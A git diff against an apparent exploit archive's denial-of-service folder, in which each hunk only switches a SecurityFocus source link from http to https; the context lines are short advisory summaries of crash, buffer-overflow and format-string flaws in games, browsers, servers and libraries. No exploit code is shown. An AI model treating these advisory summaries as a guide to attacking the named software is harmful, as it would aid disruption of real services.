b/exploits/multiple/dos/25081.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12439/info +source: https://www.securityfocus.com/bid/12439/info LANChat Pro Revival is reported prone to a remote denial of service vulnerability. It is reported that the issue presents itself when the vulnerable client processes a malformed UDP datagram. diff --git a/exploits/multiple/dos/25165.c b/exploits/multiple/dos/25165.c index c960d18d4..f85ba6970 100644 --- a/exploits/multiple/dos/25165.c +++ b/exploits/multiple/dos/25165.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12671/info +// source: https://www.securityfocus.com/bid/12671/info A remote buffer overflow vulnerability affects Stormy Studios KNet. This issue is due to a failure of the application to securely copy user-supplied input into finite process buffers. diff --git a/exploits/multiple/dos/25171.txt b/exploits/multiple/dos/25171.txt index b6d0e0b05..e814bf025 100644 --- a/exploits/multiple/dos/25171.txt +++ b/exploits/multiple/dos/25171.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12680/info +source: https://www.securityfocus.com/bid/12680/info Scrapland game server is reported prone to various denial of service vulnerabilities. These issues present themselves because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/25387.txt b/exploits/multiple/dos/25387.txt index 203e774bb..815ca0628 100644 --- a/exploits/multiple/dos/25387.txt +++ b/exploits/multiple/dos/25387.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13124/info +source: https://www.securityfocus.com/bid/13124/info Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks. diff --git a/exploits/multiple/dos/25388.txt b/exploits/multiple/dos/25388.txt index 6684bcb94..7fb02839d 100644 --- a/exploits/multiple/dos/25388.txt +++ b/exploits/multiple/dos/25388.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13124/info +source: https://www.securityfocus.com/bid/13124/info Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks. diff --git a/exploits/multiple/dos/25389.txt b/exploits/multiple/dos/25389.txt index c1756213e..a0c708fad 100644 --- a/exploits/multiple/dos/25389.txt +++ b/exploits/multiple/dos/25389.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13124/info +source: https://www.securityfocus.com/bid/13124/info Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks. diff --git a/exploits/multiple/dos/25393.txt b/exploits/multiple/dos/25393.txt index 945aaec93..d8f71d8dd 100644 --- a/exploits/multiple/dos/25393.txt +++ b/exploits/multiple/dos/25393.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13131/info +source: https://www.securityfocus.com/bid/13131/info An insecure default password disclosure vulnerability affects XAMPP. This issue is due to a failure of the application to properly secure access to default passwords. diff --git a/exploits/multiple/dos/25439.c b/exploits/multiple/dos/25439.c index 6696606e5..77f145a7a 100644 --- a/exploits/multiple/dos/25439.c +++ b/exploits/multiple/dos/25439.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13215/info +// source: https://www.securityfocus.com/bid/13215/info Multiple Vendor TCP/IP stack implementations are reported prone to a denial of service vulnerability. diff --git a/exploits/multiple/dos/25470.txt b/exploits/multiple/dos/25470.txt index 2bfefc03d..8976d95e4 100644 --- a/exploits/multiple/dos/25470.txt +++ b/exploits/multiple/dos/25470.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13281/info +source: https://www.securityfocus.com/bid/13281/info Neslo Desktop Rover is prone to a remote denial of service. Reports indicate that the software will crash when a malformed packet is processed on TCP port 61427. diff --git a/exploits/multiple/dos/25584.txt b/exploits/multiple/dos/25584.txt index 4536e4f18..d936acc64 100644 --- a/exploits/multiple/dos/25584.txt +++ b/exploits/multiple/dos/25584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13463/info +source: https://www.securityfocus.com/bid/13463/info The Mtp-Target server is prone to a memory corruption vulnerability. The issue exists because a comparison fails to ensure that an integer value parameter retrieved from a client is signed. A check is made to ensure that the user-supplied value is less than 1000000 bytes. If the value passed is FFFFFFFFh, it is interpreted as a signed -1 and the check passes. The value is later used as an unsigned integer in a memory allocation operation. An allocation of 4.29 GB of data is attempted and the service crashes. diff --git a/exploits/multiple/dos/25692.txt b/exploits/multiple/dos/25692.txt index aa3801756..8cf1d6c11 100644 --- a/exploits/multiple/dos/25692.txt +++ b/exploits/multiple/dos/25692.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13712/info +source: https://www.securityfocus.com/bid/13712/info Warrior Kings: Battles is susceptible to a remote denial of service vulnerability. This is due to a failure of the game server to properly handle exceptional conditions. diff --git a/exploits/multiple/dos/25757.txt b/exploits/multiple/dos/25757.txt index 09ed15fb6..a95eac67b 100644 --- a/exploits/multiple/dos/25757.txt +++ b/exploits/multiple/dos/25757.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13814/info +source: https://www.securityfocus.com/bid/13814/info Stronghold 2 is affected by a remote denial of service vulnerability. diff --git a/exploits/multiple/dos/25791.txt b/exploits/multiple/dos/25791.txt index b61e6bd47..a6193fc0f 100644 --- a/exploits/multiple/dos/25791.txt +++ b/exploits/multiple/dos/25791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13862/info +source: https://www.securityfocus.com/bid/13862/info Rakkarsoft RakNet is affected by a remote denial of service vulnerability. diff --git a/exploits/multiple/dos/26145.c b/exploits/multiple/dos/26145.c index 2ffbafff6..032496b7f 100644 --- a/exploits/multiple/dos/26145.c +++ b/exploits/multiple/dos/26145.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14536/info +// source: https://www.securityfocus.com/bid/14536/info Winterm 1125SE is affected by a remote denial of service vulnerability. This issue is due to the application failing to handle exceptional conditions in a proper manner. diff --git a/exploits/multiple/dos/26325.txt b/exploits/multiple/dos/26325.txt index 1c8b7fd2c..33a6eb606 100644 --- a/exploits/multiple/dos/26325.txt +++ b/exploits/multiple/dos/26325.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15015/info +source: https://www.securityfocus.com/bid/15015/info Mozilla Firefox is prone to a remote denial of service vulnerability. diff --git a/exploits/multiple/dos/26331.txt b/exploits/multiple/dos/26331.txt index a455dbe12..e057c56d2 100644 --- a/exploits/multiple/dos/26331.txt +++ b/exploits/multiple/dos/26331.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15032/info +source: https://www.securityfocus.com/bid/15032/info Oracle iSQL*PLUS is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users. diff --git a/exploits/multiple/dos/26336.txt b/exploits/multiple/dos/26336.txt index 298452c03..dedf2bcb2 100644 --- a/exploits/multiple/dos/26336.txt +++ b/exploits/multiple/dos/26336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15039/info +source: https://www.securityfocus.com/bid/15039/info Oracle Forms is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users. diff --git a/exploits/multiple/dos/26762.html b/exploits/multiple/dos/26762.html index 734760637..e3a66d7be 100644 --- a/exploits/multiple/dos/26762.html +++ b/exploits/multiple/dos/26762.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15773/info +source: https://www.securityfocus.com/bid/15773/info Mozilla Firefox is reportedly prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/26922.pl b/exploits/multiple/dos/26922.pl index dc0f5a87f..8d7abae3f 100755 --- a/exploits/multiple/dos/26922.pl +++ b/exploits/multiple/dos/26922.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16001/info +source: https://www.securityfocus.com/bid/16001/info Interaction SIP Proxy is susceptible to a remote denial of service vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied input data, resulting in a heap memory corruption. diff --git a/exploits/multiple/dos/26967.txt b/exploits/multiple/dos/26967.txt index 69c79bde2..4fdfad669 100644 --- a/exploits/multiple/dos/26967.txt +++ b/exploits/multiple/dos/26967.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16031/info +source: https://www.securityfocus.com/bid/16031/info httprint is prone to multiple remote vulnerabilities. diff --git a/exploits/multiple/dos/27026.txt b/exploits/multiple/dos/27026.txt index fd09562e0..ef2558c7c 100644 --- a/exploits/multiple/dos/27026.txt +++ b/exploits/multiple/dos/27026.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16127/info +source: https://www.securityfocus.com/bid/16127/info The Intel Graphics Accelerator driver is susceptible to a remote denial of service vulnerability. This issue is demonstrated to occur when the affected driver attempts to display an overly long text in a text area. diff --git a/exploits/multiple/dos/27094.txt b/exploits/multiple/dos/27094.txt index 6a20aeaaf..f99cbe3ca 100644 --- a/exploits/multiple/dos/27094.txt +++ b/exploits/multiple/dos/27094.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16258/info +source: https://www.securityfocus.com/bid/16258/info AmbiCom Blue Neighbors Bluetooth stack is prone to a buffer overflow vulnerability. The issue exists in the Object Push Service. diff --git a/exploits/multiple/dos/27108.txt b/exploits/multiple/dos/27108.txt index dca095883..858309087 100644 --- a/exploits/multiple/dos/27108.txt +++ b/exploits/multiple/dos/27108.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16298/info +source: https://www.securityfocus.com/bid/16298/info Dual DHCP DNS Server is prone to a remote buffer overflow vulnerability. diff --git a/exploits/multiple/dos/27140.txt b/exploits/multiple/dos/27140.txt index 6a794c07d..f5a91d9de 100644 --- a/exploits/multiple/dos/27140.txt +++ b/exploits/multiple/dos/27140.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16400/info +source: https://www.securityfocus.com/bid/16400/info Exiv2 is susceptible to a denial-of-service vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied input data before attempting to read it, resulting in an out-of-bounds memory access crash. diff --git a/exploits/multiple/dos/27159.txt b/exploits/multiple/dos/27159.txt index 3e3963158..14b9a11fd 100644 --- a/exploits/multiple/dos/27159.txt +++ b/exploits/multiple/dos/27159.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16467/info +source: https://www.securityfocus.com/bid/16467/info Fcron is susceptible to a local buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. diff --git a/exploits/multiple/dos/27171.txt b/exploits/multiple/dos/27171.txt index c8652a64f..61595a582 100644 --- a/exploits/multiple/dos/27171.txt +++ b/exploits/multiple/dos/27171.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16550/info +source: https://www.securityfocus.com/bid/16550/info Sun ONE Directory Server is prone to a remote denial-of-service vulnerability. This issue is due to the application's failure to handle malformed network traffic. diff --git a/exploits/multiple/dos/27196.txt b/exploits/multiple/dos/27196.txt index 7e7124f07..2bbe5fe83 100644 --- a/exploits/multiple/dos/27196.txt +++ b/exploits/multiple/dos/27196.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16593/info +source: https://www.securityfocus.com/bid/16593/info IBM Tivoli Directory Server is prone to an unspecified memory corruption. This issue may be triggered by malformed LDAP data. diff --git a/exploits/multiple/dos/27210.txt b/exploits/multiple/dos/27210.txt index 101065999..7e4ef497e 100644 --- a/exploits/multiple/dos/27210.txt +++ b/exploits/multiple/dos/27210.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16629/info +source: https://www.securityfocus.com/bid/16629/info eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash. diff --git a/exploits/multiple/dos/27211.txt b/exploits/multiple/dos/27211.txt index 4ab6b4ce6..9a11fadbd 100644 --- a/exploits/multiple/dos/27211.txt +++ b/exploits/multiple/dos/27211.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16629/info +source: https://www.securityfocus.com/bid/16629/info eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash. diff --git a/exploits/multiple/dos/27212.txt b/exploits/multiple/dos/27212.txt index 1538e5a16..6a64f2634 100644 --- a/exploits/multiple/dos/27212.txt +++ b/exploits/multiple/dos/27212.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16635/info +source: https://www.securityfocus.com/bid/16635/info Isode M-Vault Server is prone to a memory corruption. This issue may be triggered by malformed LDAP data. diff --git a/exploits/multiple/dos/27365.txt b/exploits/multiple/dos/27365.txt index 842056773..a7fb72576 100644 --- a/exploits/multiple/dos/27365.txt +++ b/exploits/multiple/dos/27365.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16981/info +source: https://www.securityfocus.com/bid/16981/info The Monopd game server is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/27420.c b/exploits/multiple/dos/27420.c index 8289b04f8..703f2eae8 100644 --- a/exploits/multiple/dos/27420.c +++ b/exploits/multiple/dos/27420.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17087/info +// source: https://www.securityfocus.com/bid/17087/info ENet is prone to multiple denial-of-service vulnerabilities. A remote attacker can send specifically crafted data to trigger these flaws, leading to a denial-of-service condition. diff --git a/exploits/multiple/dos/27421.txt b/exploits/multiple/dos/27421.txt index 4c184b32b..329ea1a7a 100644 --- a/exploits/multiple/dos/27421.txt +++ b/exploits/multiple/dos/27421.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17094/info +source: https://www.securityfocus.com/bid/17094/info GGZ Gaming Zone is prone to multiple remote denial-of-service vulnerabilities. These issues are due to improper input sanitization. diff --git a/exploits/multiple/dos/27460.pl b/exploits/multiple/dos/27460.pl index 95fa07d20..7ca452f80 100755 --- a/exploits/multiple/dos/27460.pl +++ b/exploits/multiple/dos/27460.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17202/info +source: https://www.securityfocus.com/bid/17202/info Various RealNetworks products are prone to multiple buffer-overflow vulnerabilities. diff --git a/exploits/multiple/dos/27474.txt b/exploits/multiple/dos/27474.txt index ee2bf92df..133c93636 100644 --- a/exploits/multiple/dos/27474.txt +++ b/exploits/multiple/dos/27474.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17237/info +source: https://www.securityfocus.com/bid/17237/info LibVC is prone to a buffer-overflow vulnerability. This issue is due to a failure in the library to perform proper bounds checks on user-supplied data before using it in a finite-sized buffer. diff --git a/exploits/multiple/dos/27547.txt b/exploits/multiple/dos/27547.txt index c40d01c23..ea053e610 100644 --- a/exploits/multiple/dos/27547.txt +++ b/exploits/multiple/dos/27547.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17340/info +source: https://www.securityfocus.com/bid/17340/info ZDaemon is prone to multiple remote vulnerabilities. diff --git a/exploits/multiple/dos/27566.txt b/exploits/multiple/dos/27566.txt index 55e95d517..ccae5f881 100644 --- a/exploits/multiple/dos/27566.txt +++ b/exploits/multiple/dos/27566.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17369/info +source: https://www.securityfocus.com/bid/17369/info Doomsday is prone to multiple remote format-string vulnerabilities. diff --git a/exploits/multiple/dos/27639.txt b/exploits/multiple/dos/27639.txt index bf8b9917e..d415a1efc 100644 --- a/exploits/multiple/dos/27639.txt +++ b/exploits/multiple/dos/27639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17507/info +source: https://www.securityfocus.com/bid/17507/info W3C Amaya is susceptible to multiple remote buffer-overflow vulnerabilities. These issues are due to the application's failure to properly bounds-check user-supplied data before copying it to insufficiently sized memory buffers. diff --git a/exploits/multiple/dos/27640.txt b/exploits/multiple/dos/27640.txt index 79a5576c1..26429fafe 100644 --- a/exploits/multiple/dos/27640.txt +++ b/exploits/multiple/dos/27640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17507/info +source: https://www.securityfocus.com/bid/17507/info W3C Amaya is susceptible to multiple remote buffer-overflow vulnerabilities. These issues are due to the application's failure to properly bounds-check user-supplied data before copying it to insufficiently sized memory buffers. diff --git a/exploits/multiple/dos/27668.c b/exploits/multiple/dos/27668.c index fc71a1674..b0591f458 100644 --- a/exploits/multiple/dos/27668.c +++ b/exploits/multiple/dos/27668.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17569/info +// source: https://www.securityfocus.com/bid/17569/info Neon Responders is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle malformed network packets. diff --git a/exploits/multiple/dos/27730.py b/exploits/multiple/dos/27730.py index b63ac5660..67cab0de9 100755 --- a/exploits/multiple/dos/27730.py +++ b/exploits/multiple/dos/27730.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17669/info +source: https://www.securityfocus.com/bid/17669/info Lotus Domino LDAP server is prone to a remote denial-of-service vulnerability when handling malformed requests. diff --git a/exploits/multiple/dos/27901.java b/exploits/multiple/dos/27901.java index fc6eca4b3..be75200c6 100644 --- a/exploits/multiple/dos/27901.java +++ b/exploits/multiple/dos/27901.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18058/info +source: https://www.securityfocus.com/bid/18058/info The Sun Java Runtime Environment is vulnerable to a denial-of-service vulnerability. This issue is due to the software's failure to handle exceptional conditions. diff --git a/exploits/multiple/dos/27915.pl b/exploits/multiple/dos/27915.pl index 593dcd741..0f6845783 100755 --- a/exploits/multiple/dos/27915.pl +++ b/exploits/multiple/dos/27915.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18138/info +source: https://www.securityfocus.com/bid/18138/info Apache James is prone to a remote denial-of-service vulnerability. This issue is due to the application's failure to efficiently handle malformed SMTP commands. diff --git a/exploits/multiple/dos/27969.c b/exploits/multiple/dos/27969.c index 12ce2a2c2..abbe8bfea 100644 --- a/exploits/multiple/dos/27969.c +++ b/exploits/multiple/dos/27969.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/18271/info +// source: https://www.securityfocus.com/bid/18271/info // // The Quake 3 engine is susceptible to a remote buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. // diff --git a/exploits/multiple/dos/27993.txt b/exploits/multiple/dos/27993.txt index d3deb400b..55bd57c6a 100644 --- a/exploits/multiple/dos/27993.txt +++ b/exploits/multiple/dos/27993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18329/info +source: https://www.securityfocus.com/bid/18329/info FreeType is prone to a denial-of-service vulnerability. This issue is due to a flaw in the library that causes a NULL-pointer dereference. diff --git a/exploits/multiple/dos/28065.vmx b/exploits/multiple/dos/28065.vmx index d1da60f5d..5a14e440e 100644 --- a/exploits/multiple/dos/28065.vmx +++ b/exploits/multiple/dos/28065.vmx @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18515/info +source: https://www.securityfocus.com/bid/18515/info VMware Player is susceptible to a denial-of-service vulnerability. This issue is due to the application's failure to properly handle excessively long data. diff --git a/exploits/multiple/dos/28182.java b/exploits/multiple/dos/28182.java index 4a73d924e..d00ae6da5 100644 --- a/exploits/multiple/dos/28182.java +++ b/exploits/multiple/dos/28182.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18869/info +source: https://www.securityfocus.com/bid/18869/info MICO is susceptible to a remote denial-of-service vulnerability. This issue is due to a failure of the application to properly handle unexpected input. diff --git a/exploits/multiple/dos/28277.txt b/exploits/multiple/dos/28277.txt index 7407135e4..78a7cde53 100644 --- a/exploits/multiple/dos/28277.txt +++ b/exploits/multiple/dos/28277.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19166/info +source: https://www.securityfocus.com/bid/19166/info Opera Web Browser is prone to a memory-corruption vulnerability. diff --git a/exploits/multiple/dos/28293.txt b/exploits/multiple/dos/28293.txt index c219a9150..ddc69a6d1 100644 --- a/exploits/multiple/dos/28293.txt +++ b/exploits/multiple/dos/28293.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19201/info +source: https://www.securityfocus.com/bid/19201/info Oracle 10g is reportedly prone to a integer-overflow vulnerability because the application fails to allocate a large enough data type to accommodate user-supplied input before using it in a query. This issue has not been confirmed. diff --git a/exploits/multiple/dos/28345.txt b/exploits/multiple/dos/28345.txt index 345154ccc..5df8377df 100644 --- a/exploits/multiple/dos/28345.txt +++ b/exploits/multiple/dos/28345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19370/info +source: https://www.securityfocus.com/bid/19370/info DConnect Daemon is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/28361.c b/exploits/multiple/dos/28361.c index c48d65f74..a53c405ba 100644 --- a/exploits/multiple/dos/28361.c +++ b/exploits/multiple/dos/28361.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19402/info +// source: https://www.securityfocus.com/bid/19402/info A buffer-overflow vulnerability occurs in the Festalon application because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/multiple/dos/28491.txt b/exploits/multiple/dos/28491.txt index b1b7fd4d4..553b3d65f 100644 --- a/exploits/multiple/dos/28491.txt +++ b/exploits/multiple/dos/28491.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19852/info +source: https://www.securityfocus.com/bid/19852/info Dsocks is prone to a remote buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/multiple/dos/28542.pl b/exploits/multiple/dos/28542.pl index 4c3c5246d..889e6544e 100755 --- a/exploits/multiple/dos/28542.pl +++ b/exploits/multiple/dos/28542.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19989/info +source: https://www.securityfocus.com/bid/19989/info Verso NetPerformer Frame Relay Access Device (FRAD) is prone to a remotely exploitable buffer overflow in the telnet service. diff --git a/exploits/multiple/dos/28666.txt b/exploits/multiple/dos/28666.txt index 84c76c6a4..8d66a1ab0 100644 --- a/exploits/multiple/dos/28666.txt +++ b/exploits/multiple/dos/28666.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20180/info +source: https://www.securityfocus.com/bid/20180/info Call of Duty server is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/multiple/dos/28726.pl b/exploits/multiple/dos/28726.pl index 3f4a7cc3a..d522585bf 100755 --- a/exploits/multiple/dos/28726.pl +++ b/exploits/multiple/dos/28726.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20246/info +source: https://www.securityfocus.com/bid/20246/info OpenSSL is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/29305.txt b/exploits/multiple/dos/29305.txt index 6e148137f..5b29d6f0b 100644 --- a/exploits/multiple/dos/29305.txt +++ b/exploits/multiple/dos/29305.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21714/info +source: https://www.securityfocus.com/bid/21714/info FTPRush is prone to a local buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input data to an insufficiently sized buffer. diff --git a/exploits/multiple/dos/29310.txt b/exploits/multiple/dos/29310.txt index 55551909e..17a9d2e08 100644 --- a/exploits/multiple/dos/29310.txt +++ b/exploits/multiple/dos/29310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21718/info +source: https://www.securityfocus.com/bid/21718/info WikiReader is prone to a local buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input data to an insufficiently sized buffer. diff --git a/exploits/multiple/dos/29362.pl b/exploits/multiple/dos/29362.pl index 6858c1e57..1e858ac61 100755 --- a/exploits/multiple/dos/29362.pl +++ b/exploits/multiple/dos/29362.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21791/info +source: https://www.securityfocus.com/bid/21791/info A remote denial-of-service vulnerability affects the DB Hub application because of a memory-corruption flaw when the application attempts to process specially crafted network traffic. diff --git a/exploits/multiple/dos/29502.html b/exploits/multiple/dos/29502.html index fca08c4eb..478d2f47e 100644 --- a/exploits/multiple/dos/29502.html +++ b/exploits/multiple/dos/29502.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22145/info +source: https://www.securityfocus.com/bid/22145/info Transmit 3 is prone to a heap-overflow vulnerability because it fails to perform sufficient boundary checks on user-supplied data before copying it to a buffer. diff --git a/exploits/multiple/dos/29875.py b/exploits/multiple/dos/29875.py index 9795b37ca..627bfec5c 100755 --- a/exploits/multiple/dos/29875.py +++ b/exploits/multiple/dos/29875.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23583/info +source: https://www.securityfocus.com/bid/23583/info aMsn is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/29900.txt b/exploits/multiple/dos/29900.txt index b214ab0e4..a5d3ce42c 100644 --- a/exploits/multiple/dos/29900.txt +++ b/exploits/multiple/dos/29900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23648/info +source: https://www.securityfocus.com/bid/23648/info Asterisk is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data before copying it to insufficiently sized buffers. diff --git a/exploits/multiple/dos/29901.txt b/exploits/multiple/dos/29901.txt index 13259a05b..4b71a79f8 100644 --- a/exploits/multiple/dos/29901.txt +++ b/exploits/multiple/dos/29901.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23648/info +source: https://www.securityfocus.com/bid/23648/info Asterisk is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data before copying it to insufficiently sized buffers. diff --git a/exploits/multiple/dos/30139.c b/exploits/multiple/dos/30139.c index 5dc302180..98762eca6 100644 --- a/exploits/multiple/dos/30139.c +++ b/exploits/multiple/dos/30139.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24284/info +// source: https://www.securityfocus.com/bid/24284/info Outpost Firewall is prone to a local denial-of-service vulnerability. diff --git a/exploits/multiple/dos/30163.html b/exploits/multiple/dos/30163.html index 82a5a4594..7d06d3894 100644 --- a/exploits/multiple/dos/30163.html +++ b/exploits/multiple/dos/30163.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24373/info +source: https://www.securityfocus.com/bid/24373/info K9 Web Protection is prone to a buffer-overflow vulnerability because it fails to perform sufficient boundary checks on user-supplied data before copying it to a buffer. diff --git a/exploits/multiple/dos/30187.txt b/exploits/multiple/dos/30187.txt index 5d9276d97..b0f41ade5 100644 --- a/exploits/multiple/dos/30187.txt +++ b/exploits/multiple/dos/30187.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24454/info +source: https://www.securityfocus.com/bid/24454/info Mbedthis AppWeb is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. diff --git a/exploits/multiple/dos/30497.c b/exploits/multiple/dos/30497.c index 5b57a0cc1..e11430df4 100644 --- a/exploits/multiple/dos/30497.c +++ b/exploits/multiple/dos/30497.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25326/info +// source: https://www.securityfocus.com/bid/25326/info The Zoidcom network library is prone to a denial of service vulnerability when handling malformed packets. diff --git a/exploits/multiple/dos/30498.txt b/exploits/multiple/dos/30498.txt index 238df7dd7..58f4a871c 100644 --- a/exploits/multiple/dos/30498.txt +++ b/exploits/multiple/dos/30498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25327/info +source: https://www.securityfocus.com/bid/25327/info Live For Speed is prone to four vulnerabilities, including buffer-overflow and denial-of-service issues. diff --git a/exploits/multiple/dos/30513.txt b/exploits/multiple/dos/30513.txt index ca459939a..9f6becf0b 100644 --- a/exploits/multiple/dos/30513.txt +++ b/exploits/multiple/dos/30513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25374/info +source: https://www.securityfocus.com/bid/25374/info The Unreal Engine is prone to a remote denial-of-service vulnerability because the application fails to properly bounds-check user-supplied input. diff --git a/exploits/multiple/dos/30519.txt b/exploits/multiple/dos/30519.txt index 65cb67551..b6eabb4e3 100644 --- a/exploits/multiple/dos/30519.txt +++ b/exploits/multiple/dos/30519.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25411/info +source: https://www.securityfocus.com/bid/25411/info Asura Engine is prone to a remote stack-based buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. diff --git a/exploits/multiple/dos/30524.txt b/exploits/multiple/dos/30524.txt index d26b56f88..4eeac9963 100644 --- a/exploits/multiple/dos/30524.txt +++ b/exploits/multiple/dos/30524.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25426/info +source: https://www.securityfocus.com/bid/25426/info Soldat is prone to multiple remote denial-of-service vulnerabilities because of how the game software handles unexpected input. diff --git a/exploits/multiple/dos/30526.txt b/exploits/multiple/dos/30526.txt index 22f7104d6..a168f529c 100644 --- a/exploits/multiple/dos/30526.txt +++ b/exploits/multiple/dos/30526.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25436/info +source: https://www.securityfocus.com/bid/25436/info Vavoom is prone to multiple remote vulnerabilities, including a buffer-overflow issue, a format-string issue, and a denial-of-service issue. diff --git a/exploits/multiple/dos/30527.txt b/exploits/multiple/dos/30527.txt index 9519c2e9f..329e52965 100644 --- a/exploits/multiple/dos/30527.txt +++ b/exploits/multiple/dos/30527.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25436/info +source: 